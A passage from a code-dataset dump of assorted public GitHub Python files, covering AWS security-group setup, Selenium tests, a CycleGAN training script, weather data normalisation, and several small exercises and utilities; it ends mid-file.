150:\n ret_subheading = subheading[0:150]\n CLogger(\"Subheading should be less than or equal to 150 characters length\")\n\n return ret_title, ret_subheading, content, created_by\n\n @staticmethod\n def __validate_affiliates(p_affiliate_name: str, p_promoted_social_networks: list, p_min_num_of_proms_per_week: int, p_social_status: str):\n if p_affiliate_name.strip() == \"\":\n CExcept(\"Affiliate cannot be anonymous\")\n elif len(p_promoted_social_networks) == 0:\n CExcept(\"Minimum on one social network to be posted\")\n affiliate_name = p_affiliate_name\n promoted_social_networks = p_promoted_social_networks\n min_num_of_proms_per_week = p_min_num_of_proms_per_week\n social_status = p_social_status\n desc_social_status = \"\"\n min_earn_per_month = 25000\n\n if p_min_num_of_proms_per_week <= 0:\n CLogger(\"Minimum on one promotion per week is needed\")\n\n if p_social_status == 0:\n min_earn_per_month = min_earn_per_month * 10\n desc_social_status = \"International Actor/Sports/Business person\"\n elif p_social_status == 1:\n min_earn_per_month = min_earn_per_month * 6\n desc_social_status = \"National Public Figure/Actor\"\n elif p_social_status == 2:\n min_earn_per_month = min_earn_per_month * 4\n desc_social_status = \"Dedicated working professional\"\n elif p_social_status == 3:\n min_earn_per_month = min_earn_per_month * 2\n desc_social_status = \"Part-time working professional\"\n else:\n desc_social_status = \"Unknown\"\n CLogger(f\"Please maintain the status to get better earn\")\n\n return affiliate_name, promoted_social_networks, min_num_of_proms_per_week, social_status, desc_social_status, min_earn_per_month\n\n\n# o = Opportunities()\n# t_c, b = o.show_blogs()\n# print(f\"Total number of blogs are {t_c}, blogs: {b}.\")\n# my_blog = {\n# \"p_title\": \"This is my first blog\",\n# \"p_subheading\": \"This blog is about how to write blog\",\n# \"p_content\": \"\"\"\n# There are no rules or standards to write a blog.\n# Blog should be sensible and useful to recognition, that's all.\n# Chrees.\n# \"\"\",\n# \"p_created_by\": \"subramanyam.sista@gmail.com\"\n# }\n# o.create_blog(**my_blog)\n# print(f\"Total number of blogs are {t_c}, blogs: {b}.\")\n#\n# myaffiliation = {\n# \"p_affiliate_name\": \"Zubuza\",\n# \"p_promoted_social_networks\": [\"manga\"],\n# \"p_min_num_of_proms_per_week\": 1,\n# \"p_social_status\": 0\n# }\n# status = o.become_an_affiliate(**myaffiliation)\n# if status == \"success\":\n# print(f\"Congratulations!!\")\n# print(o.get_affiliates())\n","repo_name":"SAI-SRINIVASA-SUBRAMANYAM/INeuronClasses","sub_path":"INeuronPracticeSessions/Tasks/Jul2022/Jul07Task/Task9.py","file_name":"Task9.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37751155307","text":"import boto3\nfrom botocore.exceptions import ClientError\nimport sys\n\n### User definedvars\nregion = 'us-east-2'\ngroup_name = 'LINUX-SG'\nenv_name = 'USE2-SB-LAB1'\n\nIpPermissions=[{'IpProtocol': 'tcp',\n 'FromPort': 22,\n 'ToPort': 22,\n 'IpRanges': [{\n 'CidrIp': '24.63.0.0/16', \n 'Description': 'Lab CIDR'}]},\n ]\n\n\n#aws_access_key = sys.argv[1]\n#aws_secret_key = sys.argv[2]\ndescription = '{0} {1}'.format(env_name, 'linux instance security group')\n\nec2 = boto3.resource('ec2',\n #aws_access_key_id = aws_access_key ,\n #aws_secret_access_key = aws_secret_key ,\n region_name = region,\n)\n\nclient = boto3.client('ec2',\n #aws_access_key_id = aws_access_key ,\n #aws_secret_access_key = aws_secret_key ,\n region_name = region,\n)\n\n\nvpc_name = '{0}{1}'.format(env_name, '-VPC')\nvpc_id = []\n\nresponse = client.describe_vpcs()\n\ncount0 = len(response['Vpcs'])\n\nresponse['Vpcs'][1]['Tags'][0]['Key']\n\nfor x in range(0,count0):\n count1 = len(response['Vpcs'][x]['Tags'])\n #print(count1)\n for y in range(0,count1):\n if response['Vpcs'][x]['Tags'][y]['Key'] == 'Name' and response['Vpcs'][x]['Tags'][y]['Value'] == vpc_name:\n vpc_id.append(response['Vpcs'][x]['VpcId'])\n else:\n continue\n\nvpc = ec2.Vpc(vpc_id[0])\n\n###########################################################################\n####### Uncomment if you are creating a new security-group ################\n###########################################################################\n\"\"\"\nsecurity_group = vpc.create_security_group(\n Description=description,\n GroupName=group_name,\n DryRun=False,\n)\n\nsg = str(security_group)\nsg_id = sg[22:42]\n\"\"\"\n##########################################################################\n##########################################################################\n##########################################################################\n\nsg_name = '{0}{1}'.format(env_name, group_name)\n\nsg_id = []\n\nresponse = client.describe_security_groups()\n\ncount3 = len(response['SecurityGroups'])\n\nfor x in range(0,count3):\n count4 = len(response['SecurityGroups'])\n for y in range(0,count4):\n if response['SecurityGroups'][y]['VpcId'] == vpc_id[0] and response['SecurityGroups'][y]['GroupName'] == group_name:\n sg_id.append(response['SecurityGroups'][y]['GroupId'])\n else:\n continue \n#print(sg_id[0])\n\nsecurity_group = ec2.SecurityGroup(sg_id[0])\n\n##########################################################################\n################# comment out if creating new security-group #############\n##########################################################################\n\n# First, we remove all existing rules in the group:\nsecurity_group.revoke_ingress(IpPermissions=security_group.ip_permissions)\n\n\n##########################################################################\n########################### Security group rules #########################\n##########################################################################\n\nsg_rule={'IpProtocol': '-1',\n 'FromPort': -1,\n 'ToPort': -1,\n 'UserIdGroupPairs': [{\n 'GroupId': sg_id[0]}]} #This will permit hosts, in this security group to talk to themselves\n\nIpPermissions.append(sg_rule)\n\n#Second, we re-apply the rules\ndata = security_group.authorize_ingress(\n IpPermissions=IpPermissions)\n\n\nvalue = '{0}{1}{2}'.format(env_name, '-', group_name)\n\ntag = security_group.create_tags(\n DryRun=False,\n Tags=[\n {\n 'Key': 'Name',\n 'Value': value\n },\n ]\n)\n\n","repo_name":"SyrusHCW/ansible-juniper","sub_path":"LINUX-SG.py","file_name":"LINUX-SG.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29502759956","text":"# Coding Interview Question\n# Backtracking Approach\n# Author: Pavan Kumar Paluri\n\ndef count_options(num_persons:int, num_groups:int)->list:\n\tlist_grp= []\n\tfinal_list= []\n\tdef helper(num_groups, list_grp, start, summ):\n\t\t# using backtracking\n\t\t# Stopping conditions..\n\t\tif summ <0 or len(list_grp)>num_groups:\n\t\t\treturn \n\t\tif summ==0 and len(list_grp)==num_groups:\n\t\t\tlist_grp = sorted(list_grp[:])\n\t\t\tif list_grp not in final_list:\n\t\t\t\tfinal_list.append(sorted(list_grp[:]))\n\t\tfor i in range(1,num_persons):\n\t\t\tlist_grp.append(i)\n\t\t\thelper(num_groups, list_grp, start, summ-i)\n\t\t\tlist_grp.pop()\n\n\tsumm = num_persons\n\thelper(num_groups, [], 0,summ)\n\treturn (final_list)\n\n\nif __name__==\"__main__\":\n\tnum_persons = int(input(\"Enter the number of persons: \"))\n\tnum_groups = int(input(\"Enter the number of groups: \"))\n\tprint(count_options(num_persons, num_groups))\n","repo_name":"pvpk1994/Leetcode_Medium","sub_path":"Python/Backtracking/grouping_options.py","file_name":"grouping_options.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9415343601","text":"import os\nfrom platform import system\n\nimport telemetry.utils.isip as isip\n\n\ndef save_uid_to_file(file_name: str, uid: str):\n \"\"\"\n Save the uid to the specified file\n \"\"\"\n try:\n # create directories recursively first\n os.makedirs(os.path.dirname(file_name), exist_ok=True)\n\n with open(file_name, 'w') as file:\n file.write(uid)\n except Exception as e:\n print('Failed to generate the UID file: {}'.format(str(e)))\n return False\n return True\n\n\ndef get_or_generate_uid(file_name: str, generator: callable, validator: [callable, None]):\n \"\"\"\n Get existing UID or generate a new one.\n :param file_name: name of the file with the UID\n :param generator: the function to generate the UID\n :param validator: the function to validate the UID\n :return: existing or a new UID file\n \"\"\"\n full_path = os.path.join(get_uid_path(), file_name)\n uid = None\n if os.path.exists(full_path):\n with open(full_path, 'r') as file:\n uid = file.readline().strip()\n\n if uid is not None and (validator is not None and not validator(uid)):\n uid = None\n\n if uid is None:\n uid = generator()\n save_uid_to_file(full_path, uid)\n return uid\n\n\ndef get_uid_path():\n \"\"\"\n Returns a directory with the the OpenVINO randomly generated UUID file.\n\n :return: the directory with the the UUID file\n \"\"\"\n platform = system()\n subdir = None\n if platform == 'Windows':\n subdir = 'Intel Corporation'\n elif platform in ['Linux', 'Darwin']:\n subdir = '.intel'\n if subdir is None:\n raise Exception('Failed to determine the operation system type')\n\n return os.path.join(isip.isip_consent_base_dir(), subdir)\n","repo_name":"zhaohb/myopenvino","sub_path":"model-optimizer/telemetry/utils/guid.py","file_name":"guid.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1183064087","text":"from traits.api import Instance\n\nfrom force_bdss.api import (\n BaseNotificationListener,\n)\n\nfrom force_gromacs.notification_listeners.driver_events import (\n SimulationProgressEvent\n)\n\nfrom .hpc_writer_model import HPCWriterModel\n\n\nclass HPCWriter(BaseNotificationListener):\n \"\"\"Class that outputs a bash script that can be submitted to a\n HPC queue in order to run Gromacs simulation on a remote cluster\"\"\"\n\n #: A reference to the HPCWriterModel object created during the\n #: force-bdss MCODriver loop. Used to pass messages to the MCO.\n model = Instance(HPCWriterModel)\n\n # --------------------\n # Private Methods\n # --------------------\n\n def _write_hpc_script(self, file_path, hpc_script):\n \"\"\"Writes HPC script to a bash file located at\n `file_path`\"\"\"\n\n if not self.model.dry_run:\n with open(file_path, 'w') as outfile:\n outfile.write(hpc_script)\n\n def _extract_simulation_name(self, bash_script):\n \"\"\"If bash_script contains simulation name, extract and\n return it, otherwise create a unique id\"\"\"\n\n lines = bash_script.split('\\n')\n\n for line in lines:\n if line.isspace():\n continue\n\n if line.startswith('#'):\n name = line.strip('# ')\n return name\n else:\n break\n\n name = f\"gromacs-sim-{str(id(line))}\"\n\n return name\n\n # --------------------\n # Public Methods\n # --------------------\n\n def create_file_path(self, simulation_name):\n \"\"\"Create a unique file path to write the a bash script\"\"\"\n\n file_path = '_'.join([self.model.prefix, simulation_name]) + '.sh'\n\n return file_path\n\n def create_hpc_script(self, bash_script):\n \"\"\"Combines UI header for HPC cluster with Gromacs\n script\"\"\"\n\n hpc_script = \"#!/bin/sh\\n\"\n hpc_script += self.model.header\n hpc_script += f\"\\n\\n{bash_script}\"\n\n return hpc_script\n\n def initialize(self, model):\n self.model = model\n\n def deliver(self, event):\n\n if isinstance(event, SimulationProgressEvent):\n\n bash_script = event.bash_script\n\n simulation_name = self._extract_simulation_name(bash_script)\n file_path = self.create_file_path(simulation_name)\n hpc_script = self.create_hpc_script(bash_script)\n\n self._write_hpc_script(file_path, hpc_script)\n\n return hpc_script\n","repo_name":"force-h2020/force-bdss-plugin-gromacs","sub_path":"force_gromacs/notification_listeners/hpc_writer/hpc_writer.py","file_name":"hpc_writer.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21063245354","text":"import csv\nimport unittest\nfrom time import sleep\nfrom automate_driver.automate_driver import AutomateDriver\nfrom model.connect_sql import ConnectSql\nfrom pages.base.base_page import BasePage\nfrom pages.login.log_in_page_read_csv import LogInPageReadCsv\nfrom pages.login.login_page import LoginPage\nfrom pages.organize_management.organize_management import OrganizeManagement\nfrom pages.organize_management.organize_management_read_csv import OrganizeManagementReadCsv\nfrom pages.user_center.user_center import UserCenter\nfrom pages.user_center.user_center_read_csv import UserCenterReadCsv\n\n\n\nclass TestCase08OrgManageDeleteOrg(unittest.TestCase):\n # 测试部门管理删除公司部门\n def setUp(self):\n self.driver = AutomateDriver()\n self.base_url = self.driver.base_url\n self.base_page = BasePage(self.driver, self.base_url)\n self.login_page = LoginPage(self.driver, self.base_url)\n self.user_center = UserCenter(self.driver, self.base_url)\n self.organize_management = OrganizeManagement(self.driver, self.base_url)\n self.log_in_page_read_csv = LogInPageReadCsv()\n self.user_center_read_csv = UserCenterReadCsv()\n self.organize_management_read_csv = OrganizeManagementReadCsv()\n self.driver.set_window_max()\n self.connect_sql = ConnectSql()\n self.driver.wait(1)\n self.driver.clear_cookies()\n self.driver.wait(1)\n\n\n\n def tearDown(self):\n self.driver.quit_browser()\n\n def test_delete_org(self):\n # 通过csv测试删除公司部门功能\n\n\n # 打开风控首页-登录页\n self.base_page.open_page()\n sleep(1)\n # 登录账号\n self.login_page.test_user_login()\n\n # 获取当前登录账户\n log_in_account = self.user_center.get_login_account()\n print(log_in_account)\n\n # 点击进入部门管理\n self.organize_management.click_org_manage()\n\n csv_file = self.user_center_read_csv.read_csv('delete_org.csv')\n csv_data = csv.reader(csv_file)\n for row in csv_data:\n delete_org = {\n \"org_name\": row[0],\n }\n\n # 按名称查找部门\n self.organize_management.search_org(delete_org['org_name'])\n\n # 点击删除\n self.organize_management.click_delete_org()\n\n # 跳出frame\n self.organize_management.switch_to_default_content()\n # 取消\n self.organize_management.delete_org_dismiss()\n\n # 切入frame\n self.organize_management.switch_to_1_frame()\n # 点击删除\n self.organize_management.click_delete_org()\n # 跳出frame\n self.organize_management.switch_to_default_content()\n # 关闭\n self.organize_management.delete_org_close()\n\n # 切入frame\n self.organize_management.switch_to_1_frame()\n # 点击删除\n self.organize_management.click_delete_org()\n # 跳出frame\n self.organize_management.switch_to_default_content()\n # 确认\n self.organize_management.delete_org_accept()\n\n # 数据库查找验证部门是否删除成功\n\n # 数据库查找部门\n org_name_after_delete = self.organize_management.get_search_result_orgname_by_sql(log_in_account, '')\n\n self.assertNotIn(delete_org['org_name'],org_name_after_delete)\n\n # 切入frame\n self.organize_management.switch_to_1_frame()\n\n\n csv_file.close()\n\n # 跳出frame\n self.organize_management.switch_to_default_content()\n # 退出登录\n self.user_center.logout()\n","repo_name":"huangqiming123/risk_control_automate_test","sub_path":"testcases/organize_management/test_case_08_org_manage_delete_org.py","file_name":"test_case_08_org_manage_delete_org.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1958243966","text":"from rest_framework import routers\n\nfrom .views import CoursesViewSet, ThemeViewSet, TestViewSet, UserViewSet, GroupViewSet, QuestionViewSet\n\n# urlpatterns = [\n# url(r'^courses/$', views.course_list),\n# url(r'^courses/(?P[0-9]+)/$', views.course_detail),\n# ]\n#\n# urlpatterns = format_suffix_patterns(urlpatterns)\n\nrouter = routers.DefaultRouter()\nrouter.register(r'courses', CoursesViewSet)\nrouter.register(r'themes', ThemeViewSet)\nrouter.register(r'tests', TestViewSet)\nrouter.register(r'users', UserViewSet)\nrouter.register(r'groups', GroupViewSet)\nrouter.register(r'questions', QuestionViewSet)\n\n# urlpatterns = [\n# url(r'^/(?P[0-9a-zA-Z_-]+)$', UserDetail.as_view(), name='user-detail'),\n# ]\n\nurlpatterns = router.urls\n","repo_name":"KuzminKirill/Django-Rest-Api-for-Android-app","sub_path":"apitry/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4813603637","text":"# https://youtu.be/VzIO5_R9XEM\r\n# https://youtu.be/2MSGnkir9ew\r\n\"\"\"\r\nCycle GAN: Monet2Photo\r\n\r\nDataset from https://people.eecs.berkeley.edu/~taesung_park/CycleGAN/datasets/\r\n\r\n\"\"\"\r\n\r\n# monet2photo\r\nfrom os import listdir\r\nfrom numpy import asarray\r\nfrom numpy import vstack\r\nfrom keras.preprocessing.image import img_to_array\r\nfrom keras.preprocessing.image import load_img\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\n# load all images in a directory into memory\r\ndef load_images(path, size=(256,256)):\r\n\tdata_list = list()\r\n\t# enumerate filenames in directory, assume all are images\r\n\tfor filename in listdir(path):\r\n\t\t# load and resize the image\r\n\t\tpixels = load_img(path + filename, target_size=size)\r\n\t\t# convert to numpy array\r\n\t\tpixels = img_to_array(pixels)\r\n\t\t# store\r\n\t\tdata_list.append(pixels)\r\n\treturn asarray(data_list)\r\n\r\n\r\n# dataset path\r\npath = 'monet2photo/'\r\n\r\n# load dataset A - Monet paintings\r\ndataA_all = load_images(path + 'trainA/')\r\nprint('Loaded dataA: ', dataA_all.shape)\r\n\r\nfrom sklearn.utils import resample\r\n#To get a subset of all images, for faster training during demonstration\r\ndataA = resample(dataA_all, \r\n replace=False, \r\n n_samples=500, \r\n random_state=42) \r\n\r\n# load dataset B - Photos \r\ndataB_all = load_images(path + 'trainB/')\r\nprint('Loaded dataB: ', dataB_all.shape)\r\n#Get a subset of all images, for faster training during demonstration\r\n#We could have just read the list of files and only load a subset, better memory management. \r\ndataB = resample(dataB_all, \r\n replace=False, \r\n n_samples=500, \r\n random_state=42) \r\n\r\n# plot source images\r\nn_samples = 3\r\nfor i in range(n_samples):\r\n\tplt.subplot(2, n_samples, 1 + i)\r\n\tplt.axis('off')\r\n\tplt.imshow(dataA[i].astype('uint8'))\r\n# plot target image\r\nfor i in range(n_samples):\r\n\tplt.subplot(2, n_samples, 1 + n_samples + i)\r\n\tplt.axis('off')\r\n\tplt.imshow(dataB[i].astype('uint8'))\r\nplt.show()\r\n\r\n\r\n\r\n# load image data\r\ndata = [dataA, dataB]\r\n\r\nprint('Loaded', data[0].shape, data[1].shape)\r\n\r\n#Preprocess data to change input range to values between -1 and 1\r\n# This is because the generator uses tanh activation in the output layer\r\n#And tanh ranges between -1 and 1\r\ndef preprocess_data(data):\r\n\t# load compressed arrays\r\n\t# unpack arrays\r\n\tX1, X2 = data[0], data[1]\r\n\t# scale from [0,255] to [-1,1]\r\n\tX1 = (X1 - 127.5) / 127.5\r\n\tX2 = (X2 - 127.5) / 127.5\r\n\treturn [X1, X2]\r\n\r\ndataset = preprocess_data(data)\r\n\r\nfrom cycleGAN_model import define_generator, define_discriminator, define_composite_model, train\r\n# define input shape based on the loaded dataset\r\nimage_shape = dataset[0].shape[1:]\r\n# generator: A -> B\r\ng_model_AtoB = define_generator(image_shape)\r\n# generator: B -> A\r\ng_model_BtoA = define_generator(image_shape)\r\n# discriminator: A -> [real/fake]\r\nd_model_A = define_discriminator(image_shape)\r\n# discriminator: B -> [real/fake]\r\nd_model_B = define_discriminator(image_shape)\r\n# composite: A -> B -> [real/fake, A]\r\nc_model_AtoB = define_composite_model(g_model_AtoB, d_model_B, g_model_BtoA, image_shape)\r\n# composite: B -> A -> [real/fake, B]\r\nc_model_BtoA = define_composite_model(g_model_BtoA, d_model_A, g_model_AtoB, image_shape)\r\n\r\nfrom datetime import datetime \r\nstart1 = datetime.now() \r\n# train models\r\ntrain(d_model_A, d_model_B, g_model_AtoB, g_model_BtoA, c_model_AtoB, c_model_BtoA, dataset, epochs=5)\r\n\r\nstop1 = datetime.now()\r\n#Execution time of the model \r\nexecution_time = stop1-start1\r\nprint(\"Execution time is: \", execution_time)\r\n\r\n############################################\r\n\r\n# Use the saved cyclegan models for image translation\r\nfrom instancenormalization import InstanceNormalization \r\nfrom keras.models import load_model\r\nfrom matplotlib import pyplot\r\nfrom numpy.random import randint\r\n\r\n# select a random sample of images from the dataset\r\ndef select_sample(dataset, n_samples):\r\n\t# choose random instances\r\n\tix = randint(0, dataset.shape[0], n_samples)\r\n\t# retrieve selected images\r\n\tX = dataset[ix]\r\n\treturn X\r\n\r\n# plot the image, its translation, and the reconstruction\r\ndef show_plot(imagesX, imagesY1, imagesY2):\r\n\timages = vstack((imagesX, imagesY1, imagesY2))\r\n\ttitles = ['Real', 'Generated', 'Reconstructed']\r\n\t# scale from [-1,1] to [0,1]\r\n\timages = (images + 1) / 2.0\r\n\t# plot images row by row\r\n\tfor i in range(len(images)):\r\n\t\t# define subplot\r\n\t\tpyplot.subplot(1, len(images), 1 + i)\r\n\t\t# turn off axis\r\n\t\tpyplot.axis('off')\r\n\t\t# plot raw pixel data\r\n\t\tpyplot.imshow(images[i])\r\n\t\t# title\r\n\t\tpyplot.title(titles[i])\r\n\tpyplot.show()\r\n\r\n# load dataset\r\nA_data = resample(dataA_all, \r\n replace=False, \r\n n_samples=50, \r\n random_state=42) # reproducible results\r\n\r\nB_data = resample(dataB_all, \r\n replace=False, \r\n n_samples=50, \r\n random_state=42) # reproducible results\r\n\r\nA_data = (A_data - 127.5) / 127.5\r\nB_data = (B_data - 127.5) / 127.5\r\n\r\n\r\n# load the models\r\ncust = {'InstanceNormalization': InstanceNormalization}\r\nmodel_AtoB = load_model('monet2photo_models/g_model_AtoB_005935.h5', cust)\r\nmodel_BtoA = load_model('monet2photo_models/g_model_BtoA_005935.h5', cust)\r\n\r\n# plot A->B->A (Monet to photo to Monet)\r\nA_real = select_sample(A_data, 1)\r\nB_generated = model_AtoB.predict(A_real)\r\nA_reconstructed = model_BtoA.predict(B_generated)\r\nshow_plot(A_real, B_generated, A_reconstructed)\r\n# plot B->A->B (Photo to Monet to Photo)\r\nB_real = select_sample(B_data, 1)\r\nA_generated = model_BtoA.predict(B_real)\r\nB_reconstructed = model_AtoB.predict(A_generated)\r\nshow_plot(B_real, A_generated, B_reconstructed)\r\n\r\n##########################\r\n#Load a single custom image\r\ntest_image = load_img('monet2photo/sunset256.jpg')\r\ntest_image = img_to_array(test_image)\r\ntest_image_input = np.array([test_image]) # Convert single image to a batch.\r\ntest_image_input = (test_image_input - 127.5) / 127.5\r\n\r\n# plot B->A->B (Photo to Monet to Photo)\r\nmonet_generated = model_BtoA.predict(test_image_input)\r\nphoto_reconstructed = model_AtoB.predict(monet_generated)\r\nshow_plot(test_image_input, monet_generated, photo_reconstructed)\r\n\r\n","repo_name":"bnsreenu/python_for_microscopists","sub_path":"253_254_cycleGAN_monet2photo/254-cycleGAN_monet2photo.py","file_name":"254-cycleGAN_monet2photo.py","file_ext":"py","file_size_in_byte":6224,"program_lang":"python","lang":"en","doc_type":"code","stars":3177,"dataset":"github-code","pt":"77"} +{"seq_id":"29732052917","text":"import numpy as np\n\ndata = np.genfromtxt(\"../data/dataset1.csv\", delimiter=\";\", usecols=[1, 2, 3, 4, 5, 6, 7], converters={5: lambda s: 0 if s == b\"-1\" else float(s), 7: lambda s: 0 if s == b\"-1\" else float(s)})\ndates = np.genfromtxt(\"../data/dataset1.csv\", delimiter=\";\", usecols=[0])\nlabels = []\nfor label in dates:\n\tif label < 20000301:\n\t\tlabels.append(\"winter\")\n\telif 20000301 <= label < 20000601:\n\t\tlabels.append(\"lente\")\n\telif 20000601 <= label < 20000901:\n\t\tlabels.append(\"zomer\")\n\telif 20000901 <= label < 20001201:\n\t\tlabels.append(\"herfst\")\n\telse: # from 01-12 to end of year\n\t\tlabels.append(\"winter\")\n\nfg_min = data[0][0]\nfg_max = data[0][0]\ntg_min = data[0][1]\ntg_max = data[0][1]\ntn_min = data[0][2]\ntn_max = data[0][2]\ntx_min = data[0][3]\ntx_max = data[0][3]\nsq_min = data[0][4]\nsq_max = data[0][4]\ndr_min = data[0][5]\ndr_max = data[0][5]\nrh_min = data[0][6]\nrh_max = data[0][6]\n\nfor date in data:\n\tif date[0] < fg_min:\n\t\tfg_min = date[0]\n\telif date[0] > fg_max:\n\t\tfg_max = date[0]\n\tif date[1] < tg_min:\n\t\ttg_min = date[1]\n\telif date[1] > tg_max:\n\t\ttg_max = date[1]\n\tif date[2] < tn_min:\n\t\ttn_min = date[2]\n\telif date[2] > tn_max:\n\t\ttn_max = date[2]\n\tif date[3] < tx_min:\n\t\ttx_min = date[3]\n\telif date[3] > tx_max:\n\t\ttx_max = date[3]\n\tif date[4] < sq_min:\n\t\tsq_min = date[4]\n\telif date[4] > sq_max:\n\t\tsq_max = date[4]\n\tif date[5] < dr_min:\n\t\tdr_min = date[5]\n\telif date[5] > dr_max:\n\t\tdr_max = date[5]\n\tif date[6] < rh_min:\n\t\trh_min = date[6]\n\telif date[6] > rh_max:\n\t\trh_max = date[6]\n\nfg_range = fg_max - fg_min\ntg_range = tg_max - tg_min\ntn_range = tn_max - tn_min\ntx_range = tx_max - tx_min\nsq_range = sq_max - sq_min\ndr_range = dr_max - dr_min\nrh_range = rh_max - rh_min\n\n\ndef normalise(date):\n\treturn [\n\t\t(date[0] - fg_min) / fg_range,\n\t\t(date[1] - tg_min) / tg_range,\n\t\t(date[2] - tn_min) / tn_range,\n\t\t(date[3] - tx_min) / tx_range,\n\t\t(date[4] - sq_min) / sq_range,\n\t\t(date[5] - dr_min) / dr_range,\n\t\t(date[6] - rh_min) / rh_range]\n\n\nnormalised_data = []\nfor date in data:\n\t# normalised_date = normalise(date)\n\tnormalised_data.append(normalise(date))\n\n# for n in range(0, len(dates)):\n# \tprint(dates[n], \":\", labels[n])\n\nvalidation_data = np.genfromtxt(\"../data/validation1.csv\", delimiter=\";\", usecols=[1, 2, 3, 4, 5, 6, 7], converters={5: lambda s: 0 if s == b\"-1\" else float(s), 7: lambda s: 0 if s == b\"-1\" else float(s)})\nvalidation_dates = np.genfromtxt(\"../data/validation1.csv\", delimiter=\";\", usecols=[0], converters={5: lambda s: 0 if s == b\"-1\" else float(s), 7: lambda s: 0 if s == b\"-1\" else float(s)})\nvalidation_labels = []\nfor label in validation_dates:\n\tif label < 20010301:\n\t\tvalidation_labels.append(\"winter\")\n\telif 20010301 <= label < 20010601:\n\t\tvalidation_labels.append(\"lente\")\n\telif 20010601 <= label < 20010901:\n\t\tvalidation_labels.append(\"zomer\")\n\telif 20010901 <= label < 20011201:\n\t\tvalidation_labels.append(\"herfst\")\n\telse: # from 01-12 to end of year\n\t\tvalidation_labels.append(\"winter\")\n\nnormalised_validation_data = []\nfor date in validation_data:\n\tnormalised_validation_data.append(normalise(date))\n\ntest_data = np.genfromtxt(\"../data/days.csv\", delimiter=\";\", usecols=[1, 2, 3, 4, 5, 6, 7], converters={5: lambda s: 0 if s == b\"-1\" else float(s), 7: lambda s: 0 if s == b\"-1\" else float(s)})\nnormalised_test_data = []\nfor date in test_data:\n\tnormalised_test_data.append(normalise(date))\n\n\nneural_network_data = np.genfromtxt(\"../data/bezdekIris.data\", delimiter=\",\", usecols=[0, 1, 2, 3])\nneural_network_classification = np.genfromtxt(\"../data/bezdekIris.data\", delimiter=\",\", usecols=[4], converters={4: lambda s: 0 if s == b\"Iris-setosa\" else 1 if s == b\"Iris-versicolor\" else 2 if s == b\"Iris-virginica\" else 3})\n","repo_name":"vasilishomegas/AAI-20","sub_path":"data/import_data.py","file_name":"import_data.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8658218896","text":"import json\n\nfrom misc import *\nimport math as m\n\n\ndef std(data):\n s = sum(data)\n l = len(data)\n\n dif = sum(map(lambda x: m.pow(x - s/l, 2), data)) / l\n\n return m.sqrt(dif)\n\n\ndef validate_pilotset(data):\n apps_left = ctx.apps.copy()\n\n try:\n ps = json.loads(data)\n for p in ps:\n if p not in ctx.pilots:\n return False, 'pilot {} not found'.format(p)\n if ps[p] is None or len(ps[p]) <= 0:\n continue\n\n pilot = ctx.pilots[p]\n\n pilot.apps = list(filter(lambda app: app in ps[p], ctx.apps))\n for app in pilot.apps:\n if app not in apps_left:\n return False, 'app {} resigned to pilot'.format(app)\n\n del apps_left[app]\n\n if len(apps_left) > 0:\n return False, 'some apps are not assigned to any pilot'\n\n # now calculate the score\n\n cons_l = []\n mem_l = []\n\n for pilot in ctx.pilots.values():\n pilot.cons = 0\n # do not reset pilot.srvs here\n\n for app in pilot.apps:\n pilot.cons += ctx.apps[app]\n pilot.srvs.update(ctx.appSrvs[app])\n\n # assume every node consumes 1 KiB memory\n pilot.mem = sum(pilot.srvs.values()) * MB_EACH_NODE\n\n cons_l.append(pilot.cons)\n mem_l.append(pilot.mem)\n\n return True, (std(cons_l), std(mem_l), sum(mem_l))\n except Exception as e:\n return False, 'returned data does not meet requirements'\n","repo_name":"chierqj/AliMiddleware","sub_path":"score/valid.py","file_name":"valid.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29475905739","text":"def rot13(result):\n resu = \"\"\n res = 'UANDRESBELLO'\n # res = input(\"Ingrese la palabra para encriptar: \")\n\n res.lower()\n var = \"abcdefghijklmnopqrstuvwxyz\"\n fun = var[13:]+var[:13]\n char = lambda c: fun[var.find(c)] if var.find(c)>-1 else c\n\n return resu.join( char(c) for c in result )\n\nprint(rot13('result'))\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema8_ej4/tema8_ej4_39276b734f207f9d35919eb772fe3b04.py","file_name":"tema8_ej4_39276b734f207f9d35919eb772fe3b04.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72342107450","text":"from config import dbTolls\nfrom files_tolls import output_message\nfrom update_tables_options.db_tools import (\n get_table_id, get_table_number_quotes, get_distinct_attributes_for_table, get_values_attribute_for_table\n)\n\n\ndef get_db_attributes_for_table(db: dbTolls, table_short_name: str) -> dict[str: tuple[str, ...]] | None:\n \"\"\" Для таблицы с коротким шифром создает словарь уникальных атрибутов и уникальных значений к ним,\n если эти значения менялись у расценок которые входят в таблицу.\n \"\"\"\n table_id = get_table_id(db, table_short_name)\n if table_id is None:\n output_message(f\"в БД не найдена таблица:\", f\"данные: {table_short_name}\")\n return None\n quotes_number = get_table_number_quotes(db, table_id)\n if quotes_number is None:\n output_message(f\"не удалось подсчитать количество расценок\", f\"в таблице с id: {table_id}\")\n return None\n attributes = get_distinct_attributes_for_table(db, table_id)\n if attributes is None:\n output_message(f\"в таблице 